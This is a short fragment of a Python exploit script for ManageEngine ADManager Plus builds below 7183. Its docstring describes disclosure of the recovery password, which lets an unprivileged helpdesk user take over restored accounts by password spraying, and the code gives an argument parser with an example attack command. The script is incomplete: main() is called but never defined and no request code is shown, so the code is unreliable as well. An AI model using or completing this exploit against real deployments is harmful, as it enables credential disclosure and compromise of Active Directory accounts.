"""
The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover.
When deleted user accounts are restored, defined password is set to the user accounts.
Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment.
"""
def get_args():
parser = argparse.ArgumentParser(
epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1")
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-a', '--auth', required=True, action='store',
help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.')
parser.add_argument('-u', '--user', required=True, action='store')
parser.add_argument('-p', '--password', required=True, action='store')
args = parser.parse_args()
return args
main()
Manageengine admanager plus build < 7183 recovery password disclosure